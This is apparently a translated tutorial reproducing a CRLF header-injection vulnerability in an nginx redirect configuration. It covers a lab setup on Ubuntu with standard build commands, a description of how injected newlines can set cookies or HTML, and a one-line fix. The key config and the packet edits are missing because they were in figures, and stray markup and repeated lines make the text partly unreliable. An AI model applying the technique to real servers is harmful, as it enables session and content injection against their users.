nginx CRLF (carriage return) injection vulnerability reproduces
< span style="font-size: 18px;">1. Vulnerability description
CRLF is “Enter+ “Line feed” (
) is the abbreviation, and its hexadecimal codes are 0x0d and 0x0a respectively. In the HTTP protocol, the HTTP header and the HTTP body are separated by two CRLFs, and the browser extracts and displays the HTTP content based on these two CRLFs. So, once we can control the characters in the HTTP message header, inject some malicious newlines, so that we can inject some session cookies or HTML code. CRLF vulnerabilities often appear in Location and Set-cookie message headers.
2. Vulnerability principle
1. Modify nginx.conf and add the following configuration in the position as shown below. This configuration implements the function of forced redirection. When users access the nginx server, they will be forced to redirect due to the existence of this configuration. Go to the link you visited before using the https protocol.
2. There are two key use points for the above configuration: one is that the $url in the configuration is controllable, so that we can fill in CRLF at the $url, and then The server accesses to achieve header injection. The second is that the server will return a 302 jump to the user, so the header parameters we injected will be returned to the client.
3. Vulnerability environment construction and reproduction
1. Install nginx on ubuntu 16.04
1.1 install nginx dependent libraries< /span>
1.1.1 Install gcc g++ dependent libraries
The ubuntu platform can use the following commands:
apt-get install build-essential p>
apt-get install libtool
1.1.2 Install pcre dependent libraries
apt-get install libpcre3 libpcre3-dev
1.1.3 Install zlib dependent libraries
apt-get install zlib1g-dev
apt-get install zlib1g-dev
span>
1.1.4 Install ssl dependency library
apt-get install openssl
1.2 install nginx
#Download the latest version:
wget http://nginx.org/download/nginx-1.11.3.tar.gz
#Unzip:
tar -zxvf nginx-1.11.3.tar.gz< /span>
#Enter the decompression directory:
cd nginx-1.11.3
#Configuration:
./configure –prefix=/usr/local/nginx
#Edit nginx:
Make
# Install nginx:
make install
#Start nginx:
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/ conf/nginx.conf
1.3 browser access, test whether nginx is successfully built
2. Modify /usr/local/nginx/conf/nginx.conf and add the following content in the position as shown below:< /span>
3. Restart nginx service
./sbin/nginx -s reload
3. Restart nginx service
./sbin/nginx -s reload
4. The browser visits http://192.168.10.137/, and then captures the packet and modifies the data packet. As shown in the figure below, CRLF header injection is successfully implemented
4. Vulnerability defense
1, delete improperly configured configuration
————— ————————————————– —————————
Reference materials: https://blog.csdn.net/liuhuaijin/article/details/77449579